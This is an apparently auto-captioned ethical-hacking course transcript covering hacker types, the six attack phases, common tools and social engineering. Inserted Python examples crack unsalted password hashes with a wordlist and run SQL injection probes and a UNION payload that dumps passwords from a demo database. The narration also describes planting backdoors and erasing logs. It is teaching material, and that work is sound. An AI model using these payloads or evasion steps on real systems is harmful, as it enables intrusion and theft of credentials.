In a computer network to obtain unauthorized access to information a hacker is a person who tries to hack into computer systems this is a misconception that hacking is always wrong there are hackers who work with different motives let’s have a look at three different types of hackers black hat hackers are individuals who

Illegally hack into a system for monetary gain on the contrary we have white hat hackers who exploit the vulnerabilities in a system by hacking into it with permission in order to defend the organization this form of hacking is absolutely legal and ethical hence they are also often referred to as ethical hackers

In addition to these hackers we also have the grey hat hackers as the name suggests the color gray is a blend of both white and black these hackers discover vulnerabilities in a system and report it to the system’s owner which is a good act but they do this without seeking the owner’s approval

Sometimes grey hat hackers also ask for money in return for the spotted vulnerabilities now that you have seen the different types of hackers let’s understand more about the hacking that is legal and valid ethical hacking through an interesting story dan runs a trading company he does online trading with the

Money his customers invest everything was going well and dan’s business was booming until a hacker decided to hack the company’s servers the hacker stole the credentials of various trading accounts he asked for a lump sum ransom in exchange for the stolen credentials dan took the hacker’s words lightly and didn’t pay the hacker

As a result the hacker withdrew money from various customers accounts and dan was liable to pay back the customers dan lost a lot of money and also the trust of his customers after this incident dan gave a lot of thought as to what could have gone wrong with the security infrastructure in his

Company he wished there was someone from his company who could have run a test attack to see how vulnerable systems were before the hacker penetrated into the network this was when he realized he needed an employee who thinks like a hacker and identifies the vulnerabilities in his network before an outsider does

To do this job he hired an ethical hacker john john was a skilled professional who worked precisely like a hacker in no time he spotted several vulnerabilities in dan’s organization and closed all the loopholes hiring an ethical hacker helped dan protect his customers from further attacks in the future

This in turn increased the company’s productivity and guarded the company’s reputation so now you know hacking is not always bad john in this scenario exposed the vulnerabilities in the existing network and such hacking is known as ethical hacking ethical hacking is divided into six different phases let us look at

These phases step by step with respect to how john our ethical hacker will act before launching an attack the first step john takes is to gather all the necessary information about the organization’s system that he intends to attack this step is called reconnaissance he uses tools like nmap and hping for this purpose

John then tries to spot the vulnerabilities if any in the target system using tools like nmap and nexpose this is the scanning phase now that he has located the vulnerabilities he then tries to exploit them this step is known as gaining access after john makes his way through the

Organization’s networks he tries to maintain his access for future attacks by installing back doors in the target system the metasploit tool helps him with this this phase is called maintaining access john is a brilliant hacker hence he tries his best not to leave any evidence of his attack

This is the fifth phase clearing tracks we now have the last phase that is reporting in this phase john documents a summary of his entire attack the vulnerabilities he spotted the tools he used and the success rate of the attack looking into the report dan is now able

To take a call and see how to protect his organization from any external cyber attacks don’t you all think john is an asset to any organization if you want to become an ethical hacker like john then there are a few skills that you need to acquire

First and foremost you need to have a good knowledge of operating environments such as windows linux unix and macintosh you must have reasonably good knowledge of programming languages such as html php python sql and javascript networking is the base of ethical hacking hence you should be good at it

Ethical hackers should be well aware of security laws so that they don’t misuse their skills finally you must have a global certification on ethical hacking to successfully bag a position of an ethical hacker like john few examples of ethical hacking certification are certified ethical hacker certification ceh comptia pentest plus

And licensed penetration tester certification to name a few simplilearn provides a cyber security expert masters program that will equip you with all the skills required by a cyber security expert you could have a look at it by clicking the link in the description the endless growth of

Technologies in this area is directly proportional to the number of cyber crimes cyber crimes are estimated to cost six trillion dollars in 2021 hence to tackle these cyber crimes organizations are continuously on the lookout for cyber security professionals the average annual salary of a certified

Ethical hacker is 91 000 dollars in the us and approximately seven lakh rupees in india so what are you waiting for get certified and become an ethical hacker like john and put an end to the cyber attacks in the world so let’s talk about hacking and what exactly hacking is hacking refers to exploiting

Weaknesses in a computer network to obtain unauthorized access to information a hacker is a person who tries to hack into computer systems now here there are some keywords that we need to understand first and foremost exploit when you are exploiting weaknesses weaknesses are technically called vulnerabilities which are basically design flaws misconfiguration

Errors usage of default usernames and passwords which have not been modified so any misconfiguration or anything that has been left behind by a security administrator that can be misused which means exploited by a hacker to gain unauthorized access so the next term is unauthorized access something that

You’re not allowed to do and when you say a hacker is a person who tries to hack it’s basically a person with malicious intent trying to gain access to a system or a resource that they are not authorized to access in the first place how do they do it they find a

Vulnerability that is a weakness or a flaw and then they misuse it to gain access to that particular network so here in the diagram you can see that a sender on the left hand side is trying to send some data to the receiver on the right-hand side the hacker would try to

Gain unauthorized access to the transmission that is being sent and would try to capture the data packets and read the secrets within let’s look at a business case scenario into hacking now there is an organization everybody is going around their own business when they realize that their systems may have

Been compromised now they’re trying to look at the customer data to ensure that that has not been compromised and trying to assure the customers however they do realize that some customer data has been lost and even the company reports have been modified as well now this is the

Scenario where there have been some security controls in place and those controls have been identified they realized that there is an attack that has happened and based on that attack they have realized that the data has now been compromised and the records have been modified by the hacker which means that the data

Is no longer trustworthy and thus cannot be used by the business for any legal transactions so then the hacker gives a call to the organization or gets connected to the organization demanding a ransom for the data to be replaced to be taken back into the original state

Where it was trusted and thus the organization can utilize it for business transactions the organization has probably no backup so they decide that they want to pay the lump sum to the hacker to restore that data so that they can continue on with the business so money exchanges hands and the hacker is able

To restore that data and the business continues as usual however the activity here is of a hacker trying to leverage the misconfiguration or the weaknesses in the organization’s security thus being able to hack them and make these ransomware demands so the company then wants to figure out even if

Having a security system in place how was the hacker able to hack their systems thus one of the employees comes up with a brilliant idea of identifying vulnerabilities in the network to proactively search for any flaws that have been left behind so that they can plug those flaws and nobody can misuse them

Thus they figure out that they want to hire an ethical hacker who would help them identify the security posture of the organization identify the weaknesses vulnerabilities and flaws and help them remedy those flaws so that in future these scenarios will not happen so before we go into an ethical

Hacker let’s understand what are the types of hackers so what are the types of hackers hacker is a technically skilled person who is very adept with computers they have good programming skills they understand how operating system works they understand how networks work they understand how to identify flaws and vulnerabilities

Within all of these aspects and then they understand and know how to misuse these flaws to get an outcome which would be detrimental to the health of the organization so there are six types of hackers that have been identified black hat hackers white hat hackers grey hat hackers script kiddies nation or state-sponsored hackers and

Hacktivists so black hat hackers are basically the malicious hackers who have malicious intent and have criminalistic tendencies they want to harm the organization by hacking into their infrastructure by destroying their infrastructure by destroying the data so that they can gain from it from a monetary perspective these guys are also

Known as crackers the main aspect of these people is that they have malicious intent they try to do unauthorized activities and they try it for personal gain another important aspect to remember is that a black hat hacker will always try to hide their identity they will protect their online

Digital identity by masking it by spoofing their ip addresses mac addresses and try to remain anonymous on the network a white hat hacker on the other hand is also an ethical hacker or a security analyst who is an individual who will do exactly the same thing that

A black hat hacker would do minus the malicious intent plus the intent of helping the organization identifying the flaws and remedying them so that nobody else can misuse those vulnerabilities so they are authorized to act on the company’s behalf they are authorized to do that activity which would help the

Company identify those flaws and thus help the company mitigate those flaws improving on their security posture so these kinds of security experts or ethical hackers would help organizations defend themselves against unauthorized attacks grey hat hackers are a blend of both white hat and black hat hackers so here they can work

Defensively and offensively both they can accept contracts from organizations to increase their security posture at the same time they can also get themselves involved in malicious activities towards other organizations to personally gain or benefit from them by doing unauthorized activity script kiddies are people who are technically not much aware of what

Hacking is they rely on existing tools that have been created by other hackers they have no technical knowledge of what they’re doing it’s just a hit or miss for them so they just get their hands on a tool they try to execute those tools if the hack works it

Works otherwise it doesn’t so these people are basically noobs or newbies who are trying to learn hacking or just people with malicious intent who just want to have some fun or are trying to impress people around them then we have the nation or the state-sponsored

Hackers as the name suggests these hackers are sponsored by their government now this may not be a legitimate job but most of the governments do have hackers enrolled on their payroll in their organizations to spy on their enemies to spy on various countries and try to figure out the aspirations of

Those countries so this is basically a spying activity where you’re technically trying to get access to other countries resources and then try to spy on them to figure out what their activities have been or what their future plans have been and then we have the hacktivist who’s an individual who has a political

Agenda to promote and they promote it by doing hacking so what is the difference between a black hat hacker and a hacktivist the black hat hacker may try to hide their identity the hacktivist will claim responsibility for what they have done so for them it’s a political agenda

Political cause and they will try to hack various organizations to promote their cause they would probably do this by defacing the website and posting the messages that they want to promote on these websites so what exactly is ethical hacking then we have discussed the types of hackers we have identified

We identified the malicious hacker as a black hat hacker, with the intent of doing harm to an organization's network for personal gain, and we discussed what the ethical hacker is. An ethical hacker would be doing the same activity, but in an authorized manner. They would have legal contracts that they sign with the organization, which give them a definite scope of what they are allowed to do and what they are not allowed to do, and the ethical hacker would function within that scope. They would execute those test scenarios, try to identify the flaws or system vulnerabilities, and then submit a report to the management on what they found. They would also help the management mitigate or resolve those weaknesses, so that nobody else can misuse them later on. They might use the same techniques and the same tools that black hat hackers do; however, the main difference here is that these guys are authorized to do that particular activity. They are doing it in a controlled manner, with the intent of helping the organization and not with the intent of personal gain.

So who is an ethical hacker? Again, an ethical hacker is a highly intelligent, highly educated person who knows how computers function, how programming languages work, how operating systems work. They can troubleshoot, they are technically very adept at computing, they understand the architecture, they understand how the various components in a computer work and can troubleshoot those components, and they are basically very good with programming as well. Now, when I say programming, we don't want the ethical hacker to be a good developer of applications; we want them to understand programming in such a way that they can create scripts, they can write their own short programs, like viruses, worms, trojans or exploits, which should help them achieve the objective that they have set out for.

So here you can see the ethical hacker: these are individuals who perform a security assessment of companies with the permission of the concerned authorities. So what is a security assessment? A security assessment is finding out the exact security posture of the organization by identifying what security controls are in place, how they have been configured, and whether there are any gaps in the configurations themselves. So an organization will hire an ethical hacker; they would give the ethical hacker information about what security controls, what firewalls, what IDSs and IPSs (intrusion detection or intrusion prevention systems) and antiviruses are already in place, and then they will ask the ethical hacker to figure out a way to bypass these mechanisms and see if they can still hack the organization.

What is the need for an ethical hacker? The need for an ethical hacker is proactive security. The ethical hacker would identify all the existing flaws in an organization and try to resolve those flaws, to help secure the organization from black hat hackers. So ethical hackers would prevent hackers from cracking into an organization's network by securing the organization, by improving its security on a periodic basis. They would also try to identify system vulnerabilities, network vulnerabilities or application-level vulnerabilities that have been missed, and then try to figure out a way of plugging them or resolving them, so that they cannot be misused by other hackers. They would also analyze and enhance the organization's security policies.

Now what are policies? Policies are basically documents created by an organization, containing rules that all the employees need to follow, to ensure that the security of the organization is maintained. For example, a password policy. A password policy would help users in an organization adhere to the standards the organization has identified for password complexity: for example, when a user creates a password it should adhere to standards where they are using random words, where it contains the alphabet A through Z in uppercase and lowercase, 0 through 9 as numerics, and special characters, and it is randomized, so that the password becomes much stronger, to prevent brute force attacks. So what would an ethical hacker do at this point in time? They would try to test the strength of the passwords to see if brute force attacks or dictionary attacks are possible, and if any of these passwords can be cracked. They will ensure that all the employees are following the policies and that all the passwords are as secure as the policies want them to be. If there are any gaps in the policies or in the implementation of the policy, it is the ethical hacker's responsibility to identify those gaps and warn the organization about them. Similarly, they would also try to protect any personal information, any data that is owned by the organization and is critical for its functioning, and they will try to protect it from falling into the hacker's hands.
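As an added example (not from the lecture or Simplilearn's material), here is how the password test just described can be scripted in Python: a checker for the complexity rules the speaker lists, and a wordlist (dictionary) attack run against stored password hashes to see which accounts fall. The user table, the wordlist and the 12-character minimum are constructed assumptions for this demo, and the hashes are assumed to be unsalted SHA-256, which is exactly what lets one precomputed candidate table be checked against every user at once.

```python
"""Password-policy check and wordlist attack (added example; assumptions noted below)."""
from __future__ import annotations

import hashlib
import re
import secrets
import string

# Complexity rules from the lecture: uppercase, lowercase, digits, special characters.
# The 12-character minimum is an assumption for this example, not from the lecture.
MIN_LENGTH = 12
POLICY_RULES = {
    "uppercase": re.compile(r"[A-Z]"),
    "lowercase": re.compile(r"[a-z]"),
    "digit": re.compile(r"[0-9]"),
    "special": re.compile(r"[^A-Za-z0-9]"),
}
# Mangling rules a wordlist attack typically adds on top of the raw words.
SUFFIXES = ("", "123", "!", "2021")


def policy_violations(password: str) -> list[str]:
    """Return the names of the rules the password fails; an empty list means compliant."""
    failures = [name for name, rule in POLICY_RULES.items() if not rule.search(password)]
    if len(password) < MIN_LENGTH:
        failures.append(f"length<{MIN_LENGTH}")
    return failures


def sha256_hex(password: str) -> str:
    """Assumed storage format: unsalted SHA-256 hex digest (weak on purpose for the demo)."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def dictionary_attack(stored_hashes: dict[str, str], wordlist: list[str]) -> dict[str, str]:
    """Hash every wordlist candidate once and look each stored hash up in that table.

    Because the hashes are unsalted, one candidate table serves every user at once.
    Returns {username: recovered_password} for each hash that matched.
    """
    candidates = {
        base + suffix
        for word in wordlist
        for base in (word, word.capitalize())
        for suffix in SUFFIXES
    }
    table = {sha256_hex(candidate): candidate for candidate in candidates}
    return {user: table[digest] for user, digest in stored_hashes.items() if digest in table}


def generate_compliant_password(length: int = 16) -> str:
    """Draw random characters until the result satisfies every policy rule."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    while True:
        candidate = "".join(secrets.choice(alphabet) for _ in range(length))
        if not policy_violations(candidate):
            return candidate


# Constructed sample data for the demo: three accounts and a tiny wordlist.
SAMPLE_WORDLIST = ["password", "welcome", "summer", "admin", "letmein"]
SAMPLE_USERS = {
    "alice": sha256_hex("Welcome123"),    # wordlist word + suffix, violates the policy
    "bob": sha256_hex("summer!"),         # wordlist word + suffix, too short
    "carol": sha256_hex("Tq7#vL2!pX9z"),  # policy-compliant, not derivable from the wordlist
}


def audit(stored_hashes: dict[str, str], wordlist: list[str]) -> dict[str, list[str]]:
    """For every account the wordlist attack recovers, report which policy rules it broke."""
    return {
        user: policy_violations(password)
        for user, password in dictionary_attack(stored_hashes, wordlist).items()
    }


if __name__ == "__main__":
    for user, violations in audit(SAMPLE_USERS, SAMPLE_WORDLIST).items():
        print(f"{user}: cracked; policy violations: {violations}")
    print("example of a compliant password:", generate_compliant_password())
```

Running it shows alice and bob cracked with their policy violations listed, while carol's policy-compliant password is not recovered from this wordlist. The finding to report is the gap between the policy and its implementation: the two cracked passwords should never have been accepted.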

Now, what are the skills that are required of an ethical hacker? These are the following skills. First and foremost, they should have good knowledge of operating systems such as Windows, Linux, Unix and Mac. Now, when we say knowledge about operating systems, it's not only about how to use those operating systems, but how to troubleshoot them, how they work, how they need to be configured, how they can be secured. For example, securing an operating system is not only installing a firewall and an antivirus; you need to configure permissions on the operating system for what users are allowed to do and what users are not allowed to do, for example limiting the installation of applications. How are we going to do that? We need to go into the Security Center of Windows and configure the security parameters there for what software is acceptable and what is not. Same with the Linux and Mac operating systems. So we need to know how we can secure these operating systems. Similarly, all of these have desktop versions and server versions. As an ethical hacker we need to know both the desktop and the server versions, how to configure them and how to provide services within the organization on these servers, so that they can be consumed in a secure manner by all the employees.

At the same time, they should also be knowledgeable about programming languages or scripting languages such as PHP, Python, Ruby, HTML (for programming, if you will), because web servers come into the picture. Again, they do not need to be great developers who can create huge applications, but they should be able to develop scripts, understand those scripts, analyze those scripts and figure out what the output of those scripts should be, to achieve the hacking goals that they have set out for.

An ethical hacker should have a very good understanding of networking. No matter whether you are in application security, network security or host-based security, since a computer will always be connected to a network, either a local area network like a LAN or the internet, we should know how networking works. We should know the seven layers of the OSI model; we should know which protocols work on those seven layers; we should know the TCP/IP model and how the OSI model maps to the TCP/IP model; we should understand how TCP and UDP work, how each and every protocol is crafted and how they are supposed to behave, so that we can analyze and understand any network-based attacks.

We should be very good with security measures, so we should know where those vulnerabilities would lie and what the latest exploits available in the market are, and we should be able to identify them. We should know the techniques and the tools for how to deal with security, how to analyze security and then how to implement security to enhance it as well.

Along with that, it is important that a security analyst or ethical hacker is aware of the local security laws and standards. Why is that? Because an organization cannot do any illegal activity. Whatever responses they have, whatever security mechanisms, whatever security controls they implement, they need to adhere to the local law of the land; they should be legal in nature and should not cause undue harm to any of the employees or any of the third-party clients that they are dealing with. So ethical hackers should be aware of what the security laws are before they implement security controls, or even before they start testing for security controls.

And all of this should be backed up by having a global certification, or a globally valid certification, related to networking, related to security, ethical hacking, the law of the land, anything and everything, maybe even programming. It's good to have a certification in PHP, Perl, Python, Ruby and so on and so forth. Why? Because most organizations, when they hire ethical hackers, look out for these certifications, especially globally valid certifications, so that they can be sure, or they can be assured, that the person they are hiring has the required skill set.

So let's talk about a few of the tools that an ethical hacker would utilize in testing scenarios. To be honest, there are hundreds of tools out there; what you see on the screen is just a few examples of them. Nessus is a vulnerability scanner. What is a vulnerability scanner? It is an automated tool that is designed to identify vulnerabilities within hosts, within operating systems, within networks. So they come with their ready-made databases of all the vulnerabilities that have already been identified, and they scan the network against that database to find out any possible flaws or any possible vulnerabilities that currently exist on the host, the operating system or the network.

Similarly, there would be application scanners like Acunetix or Arachni that would help you scan applications and identify flaws within those applications as well. Now, all of these are automated tools. The essence of the ethical hacker is that when these tools churn out their reports, the ethical hacker can understand these reports, analyze them, identify the flaws, and then craft their own exploits, or use existing exploits in a particular manner, so that they can get access or bypass the access or security control mechanisms that are already in place. How can they do that? With a tool called Metasploit. You see that big M there on the right-hand side; that M logo is for a tool called Metasploit, which is a penetration testing tool. What is a penetration testing tool? It is the tool that will allow an ethical hacker to craft their exploits, or choose their exploits, for the vulnerabilities that have been identified by Nessus. Since we are interacting with computers, we will always be interacting using tools, right? So the first tool, Nessus, identifies the flaws and the possible list of vulnerabilities; we do a penetration test using Metasploit to validate those flaws, to verify that those flaws actually exist, and to try to figure out the complexity of those flaws. That's where Metasploit helps us.

Wireshark could be used in the background while we are doing both activities, with Nessus or Metasploit, to keep track of what packets are being sent and received on the network, which will help us analyze those packets. So whenever I run a Nessus scan, I would run Wireshark in the background; it will capture the data packets, and I can go through those packets and analyze them to identify what Nessus is actually trying to do. Similarly, when I try to attack a machine using an exploit in Metasploit, I will keep Wireshark running in the background to capture the packets that have been sent and the responses that I have received from the victim, so that I can also go through those packets, analyze the responses, and analyze the attack: whether it was successful, and to what extent it was successful. It will basically also give me a validation, a proof, of the activity that has happened.

Nmap is another automated tool that allows me to scan for open ports and protocols. So why would I use Nmap? Because ports and protocols become an entry point for a hacker to gain access to devices. For example, when we connect to a web server, we connect through a web browser, but we automatically connect to port 80 using HTTP, and to port 443 using HTTPS. So if I'm connecting to a web server using HTTPS, it is safe to assume that port 443 on the web server is open to accept those connections. Similarly, there may be other services that have been left open on the web server, because nobody thought about configuring it, or because they misconfigured the web server and left unwanted services running. So Nmap will allow me to scan those ports and services and understand what services are being offered on that server. Then I can start analyzing that server, identify the flaws within those services, and then try to attack them.
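Added example, not part of the course: once Nmap has been run with XML output (-oX), the practical next step in the scanning phase is to pull the open ports and service versions out of that report and flag anything beyond the services the server is supposed to offer. The Python below does that with the standard library only. The XML embedded in it is constructed in the shape Nmap writes (the 192.0.2.10 host, its ports and version strings are invented for the demo, not real scan results), and the expected set {80, 443} is an assumption taken from the web-server scenario above.

```python
"""Parse Nmap XML (-oX) output and flag open services outside an expected set (added example)."""
from __future__ import annotations

import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample in the shape Nmap writes; host, ports and versions are invented.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.0.2.10" version="7.91">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <hostnames><hostname name="www.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="7.4" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.6" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.6" tunnel="ssl" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="3306">
        <state state="open" reason="syn-ack"/>
        <service name="mysql" product="MySQL" version="5.7.33" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="8080">
        <state state="closed" reason="reset"/>
        <service name="http-proxy" method="table" conf="3"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


@dataclass(frozen=True)
class OpenPort:
    host: str
    protocol: str
    port: int
    service: str
    product: str
    version: str


def parse_open_ports(xml_text: str) -> list[OpenPort]:
    """Return every port Nmap reports as open, with the service fingerprint if -sV found one."""
    root = ET.fromstring(xml_text)
    found: list[OpenPort] = []
    for host in root.findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        host_ip = addr.get("addr", "?") if addr is not None else "?"
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not entry points
            svc = port.find("service")
            attr = svc.attrib if svc is not None else {}
            found.append(OpenPort(
                host=host_ip,
                protocol=port.get("protocol", ""),
                port=int(port.get("portid", "0")),
                service=attr.get("name", ""),
                product=attr.get("product", ""),
                version=attr.get("version", ""),
            ))
    return found


def unexpected_services(ports: list[OpenPort],
                        expected: frozenset[int] = frozenset({80, 443})) -> list[OpenPort]:
    """Open ports beyond what the server is meant to offer: the unwanted services to look at first."""
    return [p for p in ports if p.port not in expected]


def version_targets(ports: list[OpenPort]) -> list[str]:
    """Product/version strings in the form you would feed to a vulnerability lookup."""
    return [f"{p.product} {p.version}".strip() for p in ports if p.product]


if __name__ == "__main__":
    open_ports = parse_open_ports(SAMPLE_NMAP_XML)
    for p in open_ports:
        print(f"{p.host}:{p.port}/{p.protocol} {p.service} {p.product} {p.version}")
    print("unexpected:", [p.port for p in unexpected_services(open_ports)])
    print("lookup:", version_targets(open_ports))
```

On the constructed sample, the parser returns ports 22, 80, 443 and 3306 and flags 22 and 3306 as outside the expected set; a database port reachable from the scanning host is the kind of misconfiguration the lecture describes, and the product/version strings are what you would then check against a vulnerability database.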

If the application that I'm analyzing is connected to a database and I want to do a SQL injection attack, or if Nessus tells me that a SQL injection attack may be possible on that particular application, I can use an automated tool called sqlmap, which would allow me to automatically craft all the queries that are required for a SQL injection attack and help me do that attack at the same time. So here I do not have to manually create my own queries; the sqlmap tool would automatically create them for me. What I would do is use Nessus to identify that particular flaw and, if necessary, for that flaw I would then go and use the tool sqlmap, configure it to attack that particular web server, and when I fire off the tool it will automatically start directing queries, SQL injection queries, to the database, to see if those databases are vulnerable, and if yes, what data can be retrieved from those databases. So all of these tools, in a nutshell, would help me hack networks, applications, operating systems and host devices, and this is what an ethical hacker does.
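Added example (not the lecture's code, and not sqlmap itself): the check that sqlmap automates, shown by hand in Python against an in-memory SQLite table. `login_vulnerable` builds its query by string concatenation, which is the flaw sqlmap looks for; `login_safe` is the hardened version using bound parameters. `detect_boolean_sqli` applies the same true-condition/false-condition comparison sqlmap uses to decide whether input is reaching the SQL grammar, and `dump_passwords` shows what "what data can be retrieved" means in practice, with a UNION payload. The table, usernames and passwords are constructed for the demo.

```python
"""SQL injection: vulnerable query beside the parameterized fix, plus sqlmap-style detection (added example)."""
from __future__ import annotations

import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "Tq7#vL2!pX9z"), ("bob", "summer!")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list[str]:
    """Builds the statement by concatenation: user input becomes SQL syntax (the flaw)."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(query)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list[str]:
    """Bound parameters: the driver passes values separately, so quotes in input stay data."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


def detect_boolean_sqli(conn: sqlite3.Connection, login) -> bool:
    """sqlmap-style boolean-based check: inject a TRUE and a FALSE condition and compare.

    If the two responses differ, the input is being interpreted as part of the query.
    """
    matched_true = bool(login(conn, "alice", "x' OR '1'='1"))
    matched_false = bool(login(conn, "alice", "x' OR '1'='2"))
    return matched_true != matched_false


def dump_passwords(conn: sqlite3.Connection) -> set[str]:
    """UNION-based extraction through the vulnerable login: the data an injection can retrieve."""
    payload = "x' UNION SELECT password FROM users -- "
    return set(login_vulnerable(conn, payload, "ignored"))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login injectable:", detect_boolean_sqli(db, login_vulnerable))
    print("parameterized login injectable:", detect_boolean_sqli(db, login_safe))
    print("passwords dumped via UNION:", dump_passwords(db))
```

The same two probe strings give a different answer on the two implementations: the concatenated query lets `OR '1'='1'` rewrite the WHERE clause, so the first probe matches every row and the second none, while the parameterized query treats both as literal passwords and matches nothing. Fixing the finding means moving to the second form, not filtering quote characters.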

They use these kinds of tool sets: they identify what attacks they need to do, they identify the right tool for that particular attack, they write their exploits, they create those attacks, and then they start attacking, analyze the response, and then give a report to the management, providing feedback about how the attack was created or crafted, what the response to that attack was, and whether the attack was successful or not. If successful, they would also give recommendations on what to do to prevent these attacks from happening in the future.

So when we are doing these attacks, or when we want to launch these attacks, what is the process that we would follow? There are six steps that we would do as an ethical hacker; if you are just a hacker, you probably wouldn't do the sixth step, which is the reporting step.

The first step is the reconnaissance phase, which is the information gathering phase. This is very important from an ethical hacker's perspective, or a hacker's perspective, because if I want to attack someone or something, a digital device, I need to know what I'm attacking. I need to know the IP address of the device, the MAC address of those devices; I need to know the operating system, the build or the version of that operating system, the applications on top and the versions of those applications, so I know what I'm attacking. For example, if I want to attack a server and I assume it's a Windows-based server and use a particular tool to attack it, but it actually turns out to be a Linux web server, my attacks are going to be unsuccessful. So I need to focus my attack based on what is there at the other end, and in my information gathering phase I want to identify all of that information.

Once I have that information, I'm going to scan those servers using tools like Nmap, which we just talked about, and we are going to try to see the open ports, open services and protocols that are running on that server, which can give me possible entry points into the network, the device or the operating system. At the same time, along with the scanning with Nmap, I would run a vulnerability scanner, the Nessus vulnerability scanner we talked about, or Acunetix for applications, and then I would try to identify vulnerabilities in those applications, operating systems or networks.

Once I have identified those vulnerabilities in the scanning phase, I would then move on to the gaining access phase, where I would craft my exploits, or choose existing exploits, and start attacking the victim. At this point in time, if my attack is successful, I will probably have gained access by either cracking passwords, escalating privileges, or exploiting a vulnerability that I may have found during the scanning phase.

Once I have gained my access, I want to maintain my access. Why? Because the vulnerability may not be there for long: maybe somebody updated the operating system and hence the flaw no longer exists, or somebody changed the password that I may have cracked, and thus I no longer have access. So what do I do to maintain my access? I install trojans or backdoor entries to those systems, using which I can secretly, in a covert manner, get access to those devices at my own will, at my own time, as long as those devices are available over the network. So that's where I maintain my access: I have hacked them, now I want to maintain my access, so I install a piece of software which would give me a backdoor entry to that device, no matter what.

Once I have done this, I want to clear my tracks. So whatever activity I've been doing, for example installing a trojan (a trojan is also a piece of software that creates directories and files once installed on the victim's machine), I want to hide that. If I have accessed data stores, if I have modified data, I want to hide that activity, because if the victim comes to know that something has happened, they would start increasing their security parameters, they might start scanning their devices, they may take them offline, and thus my hack would no longer be effective. The reason I'm clearing my tracks is so that the victim doesn't find out that they have been hacked or compromised, or, even if they do find out that they've been compromised, they cannot trace the compromise back to me. So I would be deleting references to any of the IP addresses or MAC addresses that I may have used to attack that particular device. This is where I need to be able to identify where those logs were created, where those traces are. Once I take off those traces, the victim would be none the wiser about whether they have been compromised or who compromised their system.

And if I am successful at all of these stages, or to whatever extent I've achieved success in any of these stages, I would then create a report based on that, and I would report to the management about the activities that we have been able to do and whatever we have been able to achieve out of those activities. For example: we identified 10 different flaws; there were 20 different attacks that we wanted to do; which attacks did we do, what was the outcome of each attack, what was the intended or expected output of that attack. I'll create a report which gives a detailed analysis of all the steps that were taken, along with screenshots and evidence of what activity was conducted, what the output was and what the expected output was, and I would submit that report to the management, giving them an idea of what vulnerabilities and flaws exist in their environment or their devices that need to be mitigated, so that security can be enhanced.

So these are the six steps that the ethical hacking process would take. Just going through this: reconnaissance is where you are going to use hacking tools like Nmap and hping to obtain information about targets; there are hundreds of tools out there, depending on what information you want. Then in scanning, again Nmap, Nexpose, these kinds of tools would be utilized to identify open ports, protocols and services. In gaining access, you are going to exploit the vulnerability by using the Metasploit tool that we talked about in the previous slides. In maintaining access, you are going to install backdoors; you can use Metasploit, and at the same time you can craft your own scripts to create a trojan and install it on the victim's machine. Once you have achieved that, clearing tracks is where you are going to clear all evidence of your activity, so that you do not get caught, or the victim doesn't even realize that they have been hacked. And once you have done all of this, we are going to create reports that are going to be submitted to the management, to help them understand the current security evaluation of their organization.

So now let's see how we can hack using social engineering. Now, what is social engineering? Social engineering is the art of manipulating humans into revealing confidential information which they otherwise would not have revealed. So this is where your social skills and your people skills come into the picture. If you are able to communicate effectively with another person, they would probably give up more information than they intended to give out.

Let's take a look at examples, right? If you see on the screen, phishing activity. What is phishing? We receive a lot of these emails on a regular basis; we have all received those emails where we have won a lottery of a few million dollars, but we never realized that we didn't purchase a lottery ticket to win a lottery in the first place. We have always had those Nigerian frauds, where a prince died in some South African country and you, out of seven billion people on the planet, have been identified as the one through whose account they want to transfer a few hundred million dollars, and they want to give you fifty percent of that money in return as a thank you. Then some very basic attacks, where you go on to websites and there's a banner flashing at you saying "congratulations, you're the one millionth visitor to this website, click here to claim your prize". All of these are social engineering attacks: phishing attacks, fake websites, fake communications being sent out to users to prey on their gullibility. Most humans have that dream of striking it rich, winning a huge lottery once and for all and living their life lavishly ever after, but sadly, in the real world, that doesn't happen that often. And if you are receiving those mails, it is very important that you first research the validity of those communications before you even want to act upon them.

So why are humans susceptible to social engineering? Because humans have emotions; machines do not. Try pleading with a machine to give you access to an account that you have forgotten the password to; the machine wouldn't even know what you are doing. Try pleading with a human: sympathy or empathy, where you could try to create a social engineering attack in which you plead with them, saying "if I do not get access to this account immediately I might lose my job, and that would put my family into problems". Somebody would feel empathy or sympathy towards you and help you reset that password and give you access to that account. It's how good the attack is and how convincing you are that determines whether this attack succeeds.

So what is a familiarity exploit? Attackers interact with victims to gain information which will benefit the attackers in cracking credentials such as passwords.

